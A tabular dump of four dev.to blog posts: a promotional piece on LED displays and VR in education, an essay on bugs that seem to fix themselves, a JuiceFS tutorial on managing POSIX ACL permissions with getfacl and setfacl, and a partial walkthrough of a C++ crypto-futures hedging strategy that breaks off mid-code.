id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,879,867 | LED companies use VR technology to layout the smart education market | New opportunities for LED companies With the rapid development of smart education, LED companies... | 0 | 2024-06-07T03:34:33 | https://dev.to/sostrondylan/led-companies-use-vr-technology-to-layout-the-smart-education-market-3hha | led, vr, technology | 1. New opportunities for LED companies
With the rapid development of smart education, LED companies have seen new market opportunities. The demand for innovative technologies in the education market is growing, especially in improving the interactivity and practicality of teaching. By combining VR technology, LED companies can provide a more immersive and interactive teaching experience for the education field, which can not only attract students' attention, but also improve teaching efficiency. [Take you to understand the working principle of LED interactive floor tile screen in 8 minutes. ](https://sostron.com/8-minutes-to-understand-the-working-principle-of-led-interactive-tile-screen/)

2. Application of VR technology in education
VR technology has broad application prospects in education. Through the virtual reality environment, students can conduct simulation experiments, reproduce historical scenes, analyze spatial structures, etc., which are difficult to achieve in traditional teaching. LED companies can enhance the presentation effect of VR teaching content by providing high-quality display solutions, making teaching more vivid and intuitive. [10 major differences between XR technology and virtual production technology. ](https://sostron.com/10-differences-between-xr-technology-and-virtual-production-technology/)

3. Combination of LED and VR technology
The combination of LED display and VR technology has brought new vitality to the education market. The high resolution, high brightness and wide color gamut of small-pitch LED display provide a more delicate and realistic visual experience for VR content. In addition, the seamless splicing capability of LED display makes large-screen display possible, which is especially important for VR applications that need to display complex scenes or data.

4. Technical challenges and solutions
Although the combination of LED and VR technology has brought new opportunities to the education market, it also faces technical challenges. For example, how to reduce the cost of using VR equipment, how to improve the interactivity and educational nature of content, and how to ensure comfort for long-term use. LED companies need to work closely with education experts, technology developers and content creators to explore solutions together. [Provide you with the price range of commercial LED display. ](https://sostron.com/commercial-led-display-price-range/)

5. Marketing and cooperation
LED companies need to consider marketing and cooperation strategies when planning the smart education market. By establishing partnerships with educational institutions, educational technology companies, and government departments, they can better understand market demand and develop products and solutions that meet educational scenarios. At the same time, by participating in educational exhibitions and holding seminars, they can increase brand awareness and expand market influence. [Why do brands prefer LED display advertising? ](https://sostron.com/why-do-brands-like-to-put-led-display-ads-most/)

6. Continuous innovation and R&D
Continuous innovation of technology is the key to the success of LED companies in the smart education market. LED companies need to continuously invest in R&D resources to improve the technical performance of products and meet the needs of the education market for high definition and high interactivity. At the same time, we also need to pay attention to the development of emerging technologies, such as 5G and artificial intelligence, and explore the possibility of combining these technologies with LED displays.
7. Conclusion
LED companies are using VR technology to deploy the smart education market, which is a bold attempt and innovation. By providing high-quality display solutions and combining VR technology, LED companies are expected to open up new market space in the field of smart education. With the continuous advancement of technology and the gradual maturity of the market, we expect LED companies to achieve more achievements in the field of smart education and make greater contributions to the development of education.
Thank you for watching. I hope we can solve your problems. Sostron is a professional [LED display manufacturer](https://sostron.com/about). We provide all kinds of displays, display leasing and display solutions around the world. If you want to know: [Special-shaped screens become a new trend in LED display screens.](https://dev.to/sostrondylan/special-shaped-screens-become-a-new-trend-in-led-display-screens-511b) Please click read.
Follow me! Take you to know more about led display knowledge.
Contact us on WhatsApp:https://api.whatsapp.com/send?phone=+8613570218702&text=Hello | sostrondylan |
1,879,866 | The Curious Case of Bugs that Fix Themselves | I can’t count how many times I had this conversation: “Good news! The bug is fixed!” “Did you fix... | 25,505 | 2024-06-07T03:34:31 | https://www.growingdev.net/p/the-curious-case-of-bugs-that-fix | programming, beginners, softwaredevelopment, softwareengineering | I can’t count how many times I had this conversation:
  “Good news! The bug is fixed!”
  “Did you fix it?”
  “No.”
  “Did anyone else fix it?”
  “No.”
  “How is it fixed then?”
  “I don’t know. I could reproduce it last week, but I cannot reproduce it anymore, so it’s fixed.”
  “Hmmm, can you dig a bit more to understand why it no longer reproduces?”
  [Two hours later]
  “I have a fix. Can you review my PR?”
## Can bugs fix themselves?
I grow extremely skeptical whenever a fellow software developer tries to convince me that an issue they were assigned to fix magically fixed itself. Software defects are a result of incorrect program logic. This logic has to change for the defect to be fixed.
Can bugs disappear? Yes, they can and do disappear. But this doesn’t mean that they are fixed. Unless the root cause has been identified and addressed, the issue exists and will pop up again.
## The most common reasons bugs disappear

Seeing an issue disappear might feel like a stroke of luck - no bug, no problem. But if the bug was not fixed, it is there - always lurking, ready to strike. Here are the most common reasons a bug may disappear:
### Environment changes
A change in the environment no longer triggers the condition responsible for the bug. For instance, a bug that could be easily reproduced on February 29th is not reproducible on March 1st.
### Configuration changes
The code path responsible for the bug may no longer be exercised after reconfiguring the application.
### Data changes
Many bugs only manifest for specific data. If this data is removed, the bug disappears until the next time the same data shows up.
### Unrelated code changes.
Someone modified the code, changing the condition that triggers the bug.
### Concurrency (threading) bugs.
Concurrency bugs are among the hardest to crack because they can’t be reproduced consistently. Troubleshooting is difficult: even small modifications to the program (e.g., adding additional logging) can make reproducing the issue much harder, which is why concurrency bugs are a great example of [Heisenbugs](https://en.m.wikipedia.org/wiki/Heisenbug). And the worst part: when the fix lands, there is always the uncertainty of whether it worked because the bug could never be reproduced consistently, to begin with.
### The bug was indeed fixed.
A developer touching the code fixed the bug. This fix doesn’t have to be intentional - sometimes, refactoring or implementing a feature may result in deleting or fixing the buggy code path.
### The bug didn’t disappear.
The developer tasked with fixing the bug missed something or didn’t understand the bug in the first place. We’ve all been there. Dismissing a popup without reading what it says or ignoring an error message indicating a problem happens to everyone.
Fixing a bug can be easier than figuring out why it stopped manifesting. But understanding why a bug suddenly disappeared is important. It allows for re-assessing its severity and priority under new circumstances.
## Conclusion
If nobody fixed it, it ain’t fixed.
---
💙 If you liked this article...
I publish a weekly newsletter for software engineers who want to grow their careers. I share mistakes I’ve made and lessons I’ve learned over the past 20 years as a software engineer.
Sign up here to get articles like this delivered to your inbox:
https://www.growingdev.net/ | moozzyk |
1,879,865 | Managing POSIX ACL Permissions in JuiceFS | Access Control Lists (ACLs) are a mechanism for implementing finer-grained permissions control in... | 0 | 2024-06-07T03:31:02 | https://dev.to/daswu/managing-posix-acl-permissions-in-juicefs-5hbe | Access Control Lists (ACLs) are a mechanism for implementing finer-grained permissions control in Unix-like systems, such as Linux, macOS, and FreeBSD. They extend the traditional Unix permissions model and provide a more flexible and detailed way to manage permissions.
In the traditional Unix permissions model, the permissions for a file or directory are categorized into three types:
- Owner permissions
- Group permissions
- Others permissions
This model is simple and easy to understand but can be limiting in scenarios that require more granular control. For example, if you want to allow a specific user to access a file without making them a part of the file's group, the traditional Unix permissions model falls short.
This is where POSIX ACLs come into play. With POSIX ACLs, you can assign individual permissions to each user or group, rather than just the file's owner, group, or others.
This article guides on managing POSIX ACLs in JuiceFS for detailed file permissions. It covers enabling ACLs, setting and checking permissions, and ensuring ACLs are preserved during file operations.
## Requirements for using ACLs in JuiceFS
[JuiceFS Enterprise Edition](https://juicefs.com/docs/cloud/) always supports ACLs, while [JuiceFS Community Edition](https://juicefs.com/docs/community/introduction/) supports POSIX ACLs starting from version 1.2. This guide focuses on the community edition.
- Before enabling ACLs in JuiceFS Community Edition, keep the following points in mind:
- ACLs are associated with the file system and cannot be disabled once enabled.
To enable ACLs on a file system, you need to upgrade all clients to version 1.2 or later to avoid interference with permissions settings by older clients.
## Prepare the file system
### Confirm the client version
Check the client version.
```bash
$ juicefs version
juicefs version 1.2.0-beta1+2024-04-18.041e931
```
As of the publication of this article, the latest client version is JuiceFS v1.2.0-beta2. You can find the precompiled version for your CPU architecture on [Github Releases](https://github.com/juicedata/juicefs/releases) or follow our document to [compile the client manually](https://juicefs.com/docs/community/getting-started/installation/#manually-compiling).
The ACL feature has no requirements on the metadata engine and can be used on any JuiceFS file system, whether created with the new client or an older one. As long as you use the new client version, you can enable ACLs in an existing file system.
### Create your file system
If you don’t have a file system, refer to the [document](https://juicefs.com/docs/community/getting-started/standalone/) to create your file system.
### Enable ACLs for the new file system
To enable ACLs when creating a file system, use the version 1.2 or later client with the `--enable-acl` option:
```bash
juicefs format --enable-acl \
--bucket xxx
--access-key xxx
--secret-key xxx
...
redis://xxx.myserver.com/1 myjfs
```
### Enable ACLs for the file system
Use the client of version 1.2 or later to enable ACLs for the existing file system with the `config` command:
```bash
juicefs config --enable-acl redis://xxx.myserver.com/1
```
### Check if a file system has ACLs enabled
You need to use the client of version 1.2 or later to check if a file system has ACLs enabled, as older clients cannot output ACL-related information. For example:
```bash
$ juicefs status redis://192.168.1.80/1
{
"Setting": {
"Name": "myjfs",
"UUID": "fdc09170-3e1b-43be-bc64-c30e6031a7b9",
"Storage": "minio",
"Bucket": "http://192.168.1.80:9123/myjfs",
"AccessKey": "herald",
"SecretKey": "removed",
"BlockSize": 4096,
"Compression": "none",
"EncryptAlgo": "aes256gcm-rsa",
"KeyEncrypted": true,
"TrashDays": 1,
"MetaVersion": 1,
"MinClientVersion": "1.1.0-A",
"DirStats": true,
"EnableACL": false
},
...
```
### Check if a file system has ACLs enabled
You need to use the client of version 1.2 or later to check if a file system has ACLs enabled, as older clients cannot output ACL-related information. For example:
```bash
$ juicefs status redis://192.168.1.80/1
{
"Setting": {
"Name": "myjfs",
"UUID": "fdc09170-3e1b-43be-bc64-c30e6031a7b9",
"Storage": "minio",
"Bucket": "http://192.168.1.80:9123/myjfs",
"AccessKey": "herald",
"SecretKey": "removed",
"BlockSize": 4096,
"Compression": "none",
"EncryptAlgo": "aes256gcm-rsa",
"KeyEncrypted": true,
"TrashDays": 1,
"MetaVersion": 1,
"MinClientVersion": "1.1.0-A",
"DirStats": true,
"EnableACL": false
},
...
```
After enabling ACLs for a file system, the minimum client version recorded in the status information will also change. For example:
```bash
{
"Setting": {
"Name": "myjfs",
"UUID": "fdc09170-3e1b-43be-bc64-c30e6031a7b9",
"Storage": "minio",
"Bucket": "http://192.168.1.80:9123/myjfs",
"AccessKey": "herald",
"SecretKey": "removed",
"BlockSize": 4096,
"Compression": "none",
"EncryptAlgo": "aes256gcm-rsa",
"KeyEncrypted": true,
"TrashDays": 1,
"MetaVersion": 1,
"MinClientVersion": "1.2.0-A",
"DirStats": true,
"EnableACL": true
},
```
## Tools for managing ACLs
In Linux, the primary tools for managing and configuring ACLs are:
- `getfacl`: Gets the ACL information of a file or directory
- `setfacl`: Sets the ACL of a file or directory.
Some Linux distributions do not install these tools by default. To install them:
- For Debian and Ubuntu systems, you can run the `sudo apt-get install acl` command.
- For Red Hat, Almalinux, and Rocky Linux, you can use the `sudo dnf install acl` command.
## Use ACLs to manage file permissions in JuiceFS
### POSIX file permissions
In Linux systems, permissions for files or directories are managed by users or groups.
For example, when you use the `ls -l` command to list the information of files in a directory, the first field of each record is a 10-character string like `-rw-r--r--`. This represents the permissions of the user, group, and others for that file:
- The 1st character represents the file type:
- `-` for a regular file
- `d` for a directory
- `l` for a symbolic link
- `s` for a socket
- The 2nd to 4th characters represent the owner's permissions:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
- The 5th to 7th characters represent the group's permissions:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
- The 8th to 10th characters represent the permissions for others:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
For example, `-rw-r--r--` indicates:
- This is a regular file.
- The owner has read and write permissions.
- The group and others have read-only permissions.

In the permissions information shown above, the owner is `herald` and the group is `admin`. If you want to grant read and write permissions for the file README.md to a user named `tom`, there are a few options:
- Setting `tom` as the owner of the file, but this would remove ownership from `herald`.
- Adding `tom` to the `admin` group and granting write permissions to the entire group. But this would break the read-only restriction for the `admin` group, giving all members read and write access.
- Assigning read and write permissions to others. But this would widen the permissions too much.
Clearly, the standard Linux permission model cannot implement fine-grained file permission control, while ACLs can easily fulfill this requirement.
### Use ACLs to assign permissions
To set ACL permissions for files and directories, you can use the tools `getfacl` and `setfacl`:
- `getfacl` lists the ACL information.
- `setfacl` sets ACL permissions.
#### Set ACL permissions for files
Using the README.md file as an example, first, check its ACL settings:

The output shows the file's ACL information:
- The first three lines are the file name, owner, and group.
- The next three lines show the current permissions settings, which match those listed by the `ls -l` command. This means that without ACL settings, the displayed information is the default POSIX permissions.
Now, use `setfacl` to grant read and write permissions to a user named `tom`, who is not in the admin group. The syntax for setting ACL permissions for a user is `setfacl -m u:username:permissions filename_or_directoryname`.

As shown in the figure:
1. The `id` command confirms that the user is not in the `admin` user group.
2. `setfacl` grants the user `rw` read-write permissions.
3. After setting the permissions, `getfacl` lists the file's ACL settings.
After setting, the output shows two new lines:
- `user:tom:rw-`: The newly added ACL entry, indicating that user `tom` has read and write permissions for the file.
- `mask::rw-`: It is the permission mask automatically added by the ACL to the file. It sets the maximum effective permissions for ACL entries in the group class.
Now, user `tom` has edit permissions for the README.md file and can verify this by using `sudo -u tom nano README.md` to modify and save the file.
In my system, there is a user named `jerry` in the `admin` group. As the figure below shows, when attempting to edit the file as `jerry`, it shows that it does not have write permissions:

This indicates that the ACL settings did not affect the default file permissions.
Similarly, you can assign read and write permissions to a specific user group using the syntax `setfacl -m g:user-group:permissions filename_or_directoryname`.

As shown in the image, the `www-data` user group was granted read and write permissions for the README.md file. This means that all users in this group now have read and write access to the file. However, the default POSIX permissions for the `admin` user group remain read-only. This allows for flexible permission definitions for any number of users or groups based on specific needs.
#### Set ACL permissions for a directory
Setting ACL permissions for a directory is similar to setting them for a file. Use `getfacl` to retrieve the ACL information for the directory, and `setfacl` to set the ACL permissions.
As the figure below shows, I extracted files at the JuiceFS mount point and created a new directory. By using `getfacl`, I retrieved the ACL information for this directory and used `setfacl` to grant user `tom` read, write, and execute (rwx) permissions for the directory.

From the figure, you can see that directories by default include execute (x) permissions; without these, you cannot enter the directory. Following this logic, you can set ACL permissions based on directory access, such as restricting the `www-data` group from accessing the directory using `sudo setfact -m g:www-data:wr- directory`.

Similarly, you can assign access permissions for any user or group to a directory. To apply the ACL rules to all files and directories, use the `-R` option. For example, `setfacl -R -m u:tom:wrx your-directory`.
#### Set default ACL permissions for a directory
You might notice that setting ACL permissions on a directory only affects the directory itself. For example, granting `tom` rwx permissions to the directory does not provide write access to the files within. This is because ACL settings do not propagate by default.
To propagate ACL permissions to newly created files in a directory, use default permissions by adding the `-d` option when setting them.

After setting default permissions, the directory's ACL information will include default definitions. Any new files added to this directory will automatically inherit these default ACL permissions. In the example above, `tom` will have full read, write, and execute permissions for any new files or directories created within.
Note that the default ACL permissions do not affect existing files in the directory. To apply the ACL rules to existing files, use the `-R` option. For example, `setfacl -R -m u:tom:wrx your-directory`.
#### Remove ACL permissions
To remove ACL rules defined on a file or directory, use the `-x` option, as shown in the figure below:

In addition, to recursively remove all ACL settings from all files in a directory, use `setfacl -R -b your-directory`.
## Note
**Preserving ACL permissions during copying**
Tools like `cp` and `rsync` do not preserve ACL settings by default. To retain ACL permissions during file or directory operations, ensure you understand the relevant options for these tools. For example:
```bash
# cp uses -a or --archive
cp -a source file destination
# rsync uses -X or --acl
rsync -avX source file destination
```
## Conclusion
This article introduced the basic usage of POSIX ACL from the perspective of the JuiceFS file system, highlighting the differences from default POSIX permissions and considerations in daily use. It provides detailed examples of using `getfacl` and `setfacl` commands for setting file, directory, and default ACL permissions.
I hope this information is helpful to JuiceFS users. If you have any feedback or suggestions, you can join JuiceFS [discussions on GitHub](https://github.com/juicedata/juicefs/discussions) and [our community on Slack](https://juicefs.slack.com/ssb/redirect). | daswu | |
1,879,863 | "C++ version of OKX futures contract hedging strategy" that takes you through hardcore quantitative strategy | Speaking of hedging strategies, there are various types, diverse combinations, and diverse ideas in... | 0 | 2024-06-07T03:23:18 | https://dev.to/fmzquant/c-version-of-okx-futures-contract-hedging-strategy-that-takes-you-through-hardcore-quantitative-strategy-1p9 | strategy, trading, hedging, contract | Speaking of hedging strategies, there are various types, diverse combinations, and diverse ideas in various markets. We explore the design ideas and concepts of the hedging strategy from the most classic intertemporal hedging. Today, the crypto currency market is much more active than at the beginning, and there are also many futures contract exchanges that offer plenty of opportunities for arbitrage hedging. Spot cross-market arbitrage, cash hedge arbitrage, futures intertemporal arbitrage, futures cross-market arbitrage, etc., crypto quantitative trading strategies emerge one after another. Let's take a look at a "hardcore" intertemporal hedging strategy written in c++ and trading on the OKEX exchange. The strategy is based on the FMZ Quant quantitative trading platform.
## Principle of strategy
Why is the strategy somewhat hardcore because the strategy is written in c++ and the strategy reading is slightly more difficult. But it does not prevent readers from learning the essence of this strategy design and ideas. The strategy logic is relatively simple, the code length is moderate, only 500 lines. In terms of market data acquisition, unlike the other strategies that use the "rest" interface. This strategy uses the "websocket" interface to acept exchange market quotes.
In terms of design, the strategy structure is reasonable, the code coupling degree is very low, and it is convenient to expand or optimize. The logic is clear, and such a design is not only easy to understand. As a teaching material, learning this strategy's design is also a good example. The principle of this strategy is relatively simple, that is, does the spread of forward contract and recent contract are positive or negative? the basic principle is consistent with the intertemporal hedging of commodity futures.
- Spread Positive, selling short forward contracts, buying long recent contracts.
- Spread negative, buying long forward contracts, selling short recent contracts.
After understand the basic principles, the rest is how the strategy triggers the opening position of the hedge, how to close the position, how to add positions, total position control method and other strategy details processing.
The hedging strategy is mainly concerned with the fluctuation of the subject price difference (The Spread) and the regression of it. However, the difference is likely to fluctuate slightly, or to oscillate sharply, or in one direction.
This brings uncertainty about hedging profits and losses, but the risk is still much smaller than the unilateral trend. for the various optimizations of the intertemporal strategy, we can choose to start from the position controlling level and the opening and closing trigger condition. for example, we can use the classic "Bollinger band Indicator" to determine the price fluctuation. Due to the reasonable design and low coupling degree, this strategy can be easily modified into the "Bollinger index intertemporal hedging strategy"
## Analysis of strategy code
Looking at the code throughout, you can conclude that the code is roughly divided into four parts.
1. Enumerate value definitions, define some state values, and use to mark states. Some functional functions that are not related to the strategy, such as url encoding functions, time conversion functions, etc., have no relationship with the strategy logic, just for the data processing.
2. K-line data generator class: The strategy is driven by the K-line data generated by the generator class object.
3. Hedging class: Objects of this class can perform specific trading logic, hedging operations, and processing details of the strategy.
4. The main function of the strategy, which is the "main" function. The main function is the entry function of the strategy. The main loop is executed inside this function. In addition, this function also performs an important operation, that is, acessing the websocket interface of the exchange, and obtaining the pushed raw tick market data as the K-line data generator.
**Through the overall understanding of the strategy code, we can gradually learn the various aspects of the strategy, and then study the design, ideas and skills of the strategy.**
- Enumeration value definition, other function functions
1. enumerated type State statement
```
enum State { // Enum type defines some states
STATE_NA, // Abnormal state
STATE_IDLE, // idle
STATE_HOLD_LONG, // holding long positions
STATE_HOLD_SHORT, // holding short positions
};
```
Because some functions in the code return a state, these states are defined in the enumeration type State.
Seeing that STATE_NA appears in the code is abnormal, and STATE_IDLE is idle, that is, the state of the operation can be hedged. STATE_HOLD_LONG is the state in which the positive hedge position is held. STATE_HOLD_SHORT is the state in which the negative hedge position is held.
2. string substitution, not called in this strategy, is an alternate utility function, mainly dealing with strings.
```
string replace(string s, const string from, const string& to)
```
3. A Function for converting to hexadecimal characters toHex
```
inline unsigned char toHex(unsigned char x)
```
4. Handling url encoded functions
```
std::string urlencode(const std::string& str)
```
5. A time conversion function that converts the time in string format to a timestamp.
```
uint64_t _Time(string &s)
```
- K line data generator class
```
class BarFeeder { // K line data generator class
public:
BarFeeder(int period) : _period(period) { // constructor with argument "period" period, initialized in initialization list
_rs.Valid = true; // Initialize the "Valid" property of the K-line data in the constructor body.
}
void feed(double price, chart *c=nullptr, int chartIdx=0) { // input data, "nullptr" null pointer type, "chartIdx" index default parameter is 0
uint64_t epoch = uint64_t(Unix() / _period) * _period * 1000; // The second-level timestamp removes the incomplete time period (incomplete _period seconds) and is converted to a millisecond timestamp.
bool newBar = false; // mark the tag variable of the new K line Bar
if (_rs.size() == 0 || _rs[_rs.size()-1].Time < epoch) { // if the K line data is 0 in length. Or the last bar's timestamp is less than epoch (the last bar of the K line is more than the current most recent cycle timestamp)
record r; // declare a K line bar structure
r.Time = epoch; // construct the K line bar of the current cycle
r.Open = r.High = r.Low = r.close = price; // Initialize the property
_rs.push_back(r); // K line bar is pressed into the K line data structure
if (_rs.size() > 2000) { // if the K-line data structure length exceeds 2000, the oldest data is removed.
_rs.erase(_rs.begin());
}
newBar = true; // tag
} else { // In other cases, it is not the case of a new bar.
record &r = _rs[_rs.size() - 1]; // Reference the data of the last bar in the data.
r.High = max(r.High, price); // The highest price update operation for the referenced data.
r.Low = min(r.Low, price); // The lowest price update operation for the referenced data.
r.close = price; // Update the closing price of the referenced data.
}
auto bar = _rs[_rs.size()-1]; // Take the last column data and assign it to the bar variable
json point = {bar.Time, bar.Open, bar.High, bar.Low, bar.close}; // construct a json type data
if (c != nullptr) { // The chart object pointer is not equal to the null pointer, do the following.
if (newBar) { // judge if the new Bar appears
c->add(chartIdx, point); // call the chart object member function add to insert data into the chart object (new k line bar)
c->reset(1000); // retain only 1000 bar of data
} else {
c->add(chartIdx, point, -1); // Otherwise update (not new bar), this point (update this bar).
}
}
}
records & get() { // member function, method for getting K line data.
Return _rs; // Returns the object's private variable _rs . (ie generated K-line data)
}
private:
int _period;
records _rs;
};
```
This class is mainly responsible for processing the acquired tick data into a difference K line for driving the strategy hedging logic.
Some readers may have questions, why use tick data? Why construct a K-line data generator like this? Is it not good to use K-line data directly? This kind of question has been issued in three bursts. When I wrote some hedging strategies, I also made a fuss. I found the answer when I wrote the "Bollinger hedge strategy". Since the K-line data for a single contract is the price change statistics for this contract over a certain period of time.
The K-line data of the difference between the two contracts is the difference price change statistics in a certain period. Therefore, it is not possible to simply take the K-line data of each of the two contracts for subtraction and calculate the difference of each data on each K-line Bar. The most obvious mistake is, for example, the highest price and the lowest price of two contracts, not necessarily at the same time. So the subtracted value doesn't make much sense.
Therefore, we need to use real-time tick data to calculate the difference in real time and calculate the price change in a certain period in real time (that is, the highest, lowest, open and close price on the K-line column). So we need a K-line data generator, as a class, a good separation of processing logic.
- Hedging class
```
class Hedge { // Hedging class, the main logic of the strategy.
public:
Hedge() { // constructor
...
};
State getState(string &symbolA, depth &depthA, string &symbolB, depth &depthB) { // Get state, parameters: contract A name, contract A depth data, contract B name, contract B depth data
...
}
bool Loop(string &symbolA, depth &depthA, string &symbolB, depth &depthB, string extra="") { // Opening and closing position main logic
...
}
private:
vector<double> _addArr; // Hedging adding position list
string _state_desc[4] = {"NA", "IDLE", "LONG", "SHORT"}; // Status value Description
int _countOpen = 0; // number of opening positions
int _countcover = 0; // number of closing positions
int _lastcache = 0; //
int _hedgecount = 0; // number of hedging
int _loopcount = 0; // loop count (cycle count)
double _holdPrice = 0; // holding position price
BarFeeder _feederA = BarFeeder(DPeriod); // A contract Quote K line generator
BarFeeder _feederB = BarFeeder(DPeriod); // B contract Quote K line generator
State _st = STATE_NA; // Hedging type Object Hedging position status
string _cfgStr; // chart configuration string
double _holdAmount = 0; // holding position amount
bool _iscover = false; // the tag of whether to close the position
bool _needcheckOrder = true; // Set whether to check the order
chart _c = chart(""); // chart object and initialize
};
```
Because the code is relatively long, some parts are omitted, this is mainly showing the structure of this hedge class, the constructor Hedge function is omitted, mainly for the purpose the object initialization. Next, we introduce the two main "function" functions.
**getState**
This function mainly deals with order inspection, order cancellation, position detection, position balancing and so on. Because in the process of hedging transactions, it is impossible to avoid a single leg (that is, a contract is executed, another one is not), if the examination is performed in the placing order logic, and then the processing of the re-send order operation or closing position operation, the strategy logic will be chaotic.
So when designing this part, I took another idea. if the hedging operation is triggered, as long as the order is placed once, regardless of whether there is a single-leg hedging, the default is that the hedging is sucessful, and then the position balance is detected in the getState function, and the logic for processing the balance will be deal with independently.
**Loop**
The trading logic of the strategy is encapsulated in this function, in which getState is called, and the K-line data generator object is used to generate the K-line data of the difference(the spread), and the judgment of opening, closing, and adding position logic is performed. There are also some data update operations for the chart.
- Strategy main function
```
void main() {
...
string realSymbolA = exchange.SetcontractType(symbolA)["instrument"]; // Get the A contract (this_week / next_week / quarter ), the real contract ID corresponding to the week, next week, and quarter of the OKEX futures contract.
string realSymbolB = exchange.SetcontractType(symbolB)["instrument"]; // ...
string qs = urlencode(json({{"op", "subscribe"}, {"args", {"futures/depth5:" + realSymbolA, "futures/depth5:" + realSymbolB}}}).dump()) ; // jSON encoding, url encoding for the parameters to be passed on the ws interface
Log("try connect to websocket"); // Print the information of the connection WS interface.
auto ws = Dial("wss://real.okex.com:10442/ws/v3|compress=gzip_raw&mode=recv&reconnect=true&payload="+qs); // call the FMZ API "Dial" function to acess the WS interface of OKEX Futures
Log("connect to websocket sucess");
depth depthA, depthB; // Declare two variables of the depth data structure to store the depth data of the A contract and the B contract
auto filldepth = [](json &data, depth &d) { // construct the code for the depth data with the json data returned by the interface.
d.Valid = true;
d.Asks.clear();
d.Asks.push_back({atof(string(data["asks"][0][0]).c_str()), atof(string(data["asks"][0][1]).c_str( ))});
d.Bids.clear();
d.Bids.push_back({atof(string(data["bids"][0][0]).c_str()), atof(string(data["bids"][0][1]).c_str( ))});
};
string timeA; // time string A
string timeB; // time string B
while (true) {
auto buf = ws.read(); // Read the data pushed by the WS interface
...
}
```
After the strategy is started, it is executed from the main function. In the initialization of the main function, the strategy subscribes to the tick market of the websocket interface. The main job of the main function is to construct a main loop that continuously receives the tick quotes pushed by the exchange's websocket interface, and then calls the member function of the hedge class object: Loop function. The trading logic in the Loop function is driven by the market data.
One point to note is that the tick market mentioned above is actually the subscription order thin depth data interface, which is the order book data for each file. However, the strategy only uses the first file of data, in fact, it is almost the same as the tick market data. The strategy does not use the data of other files, nor does it use the order value of the first file.
Take a closer look at how the strategy subscribes to the data of the websocket interface and how it is set up.
```
string qs = urlencode(json({{"op", "subscribe"}, {"args", {"futures/depth5:" + realSymbolA, "futures/depth5:" + realSymbolB}}}).dump());
Log("try connect to websocket");
auto ws = Dial("wss://real.okex.com:10442/ws/v3|compress=gzip_raw&mode=recv&reconnect=true&payload="+qs);
Log("connect to websocket sucess");
```
First, the url encoding of the subscription message json parameter passed by the subscribed interface, that is, the value of the payload parameter. Then an important step is to call the FMZ Quant platform's API interface function Dial function. The Dial function can be used to acess the exchange's websocket interface. Here we make some settings, let the websocket connection control object ws to be created have automatic reconnection of disconnection (the subscription message still uses the value qs string of the payload parameter), to achieve this function, you need to add configuration in the parameter string of the Dial function.
The beginning of the Dial function parameter is as follows:
```
wss://real.okex.com:10442/ws/v3
```
This is the address of the websocket interface that needs to be acessed, and is separated by "|".
compress=gzip_raw&mode=recv&reconnect=true&payload="+qs are all configuration parameters.

After this setting, even if the websocket connection is disconnected, FMZ Quant trading platform's underlying system of the docker system will automatically reconnect and get the latest market data in time.
Grab every price fluctuation and quickly capture the right hedge.
- Position control
Position control is controlled using a ratio of hedge positions similar to the “Fibonaci” series.
```
for (int i = 0; i < AddMax + 1; i++) { // construct a data structure that controls the number of scalping, similar to the ratio of the Bofinac sequence to the number of hedges.
if (_addArr.size() < 2) { // The first two added positions are changed as: double the number of hedges
_addArr.push_back((i+1)*OpenAmount);
}
_addArr.push_back(_addArr[_addArr.size()-1] + _addArr[_addArr.size()-2]); // The last two adding positions are added together, and the current position quantity is calculated and stored in the "_addArr" data structure.
}
```
It can be seen that the number of additional positions added each time is the sum of the last two positions.
Such position control can realize the larger the difference, the relative increase of the arbitrage hedge, and the dispersion of the position, so as to grasp the small position of the small price fluctuation, and the large price fluctuation position is appropriately increased.
- closing position: stop loss and take profit
Fixed stop loss spread and take profit spread.
When the position difference reaches the take profit position and the stop loss position, the take profit and stop loss are carried out.
- The designing of entering the market and leaving the market
The period of the parameter NPeriod control provides some dynamic control over the opening and closing position of the strategy.
- Strategy chart
The strategy automatically generates a spread K-line chart to mark relevant transaction information.
c++ strategy custom chart drawing operation is also very simple. You can see that in the constructor of the hedge class, we use the written chart configuration string _cfgStr to configure the chart object _c, _c is the private component of the hedge class. When the private member is initialized, the chart object constructed by the FMZ Quant platform custom chart API interface function is called.
```
_cfgStr = R"EOF(
[{
"extension": { "layout": "single", "col": 6, "height": "500px"},
"rangeSelector": {"enabled": false},
"tooltip": {"xDateformat": "%Y-%m-%d %H:%M:%S, %A"},
"plotOptions": {"candlestick": {"color": "#d75442", "upcolor": "#6ba583"}},
"chart":{"type":"line"},
"title":{"text":"Spread Long"},
"xAxis":{"title":{"text":"Date"}},
"series":[
{"type":"candlestick", "name":"Long Spread","data":[], "id":"dataseriesA"},
{"type":"flags","data":[], "onSeries": "dataseriesA"}
]
},
{
"extension": { "layout": "single", "col": 6, "height": "500px"},
"rangeSelector": {"enabled": false},
"tooltip": {"xDateformat": "%Y-%m-%d %H:%M:%S, %A"},
"plotOptions": {"candlestick": {"color": "#d75442", "upcolor": "#6ba583"}},
"chart":{"type":"line"},
"title":{"text":"Spread Short"},
"xAxis":{"title":{"text":"Date"}},
"series":[
{"type":"candlestick", "name":"Long Spread","data":[], "id":"dataseriesA"},
{"type":"flags","data":[], "onSeries": "dataseriesA"}
]
}
]
)EOF";
_c.update(_cfgStr); // Update chart objects with chart configuration
_c.reset(); // Reset chart data.
```
```
call _c.update(_cfgStr); Use _cfgStr to configure to the chart object.
call _c.reset(); to reset the chart data.
```
When the strategy code needs to insert data into the chart, it also calls the member function of the _c object directly, or passes the reference of _c as a parameter, and then calls the object member function (method) of _c to update the chart data and insert operation.
Eg:
```
_c.add(chartIdx, {{"x", UnixNano()/1000000}, {"title", action}, {"text", format("diff: %f", opPrice)}, {"color", color}});
```
After placing the order, mark the K line chart.
As follows, when drawing a K line, a reference to the chart object _c is passed as a parameter when calling the member function feed of the BarFeeder class.
```
void feed(double price, chart *c=nullptr, int chartIdx=0)
```
That is, the formal parameter c of the feed function.
```
json point = {bar.Time, bar.Open, bar.High, bar.Low, bar.close}; // construct a json type data
if (c != nullptr) { // The chart object pointer is not equal to the null pointer, do the following.
if (newBar) { // judge if the new Bar appears
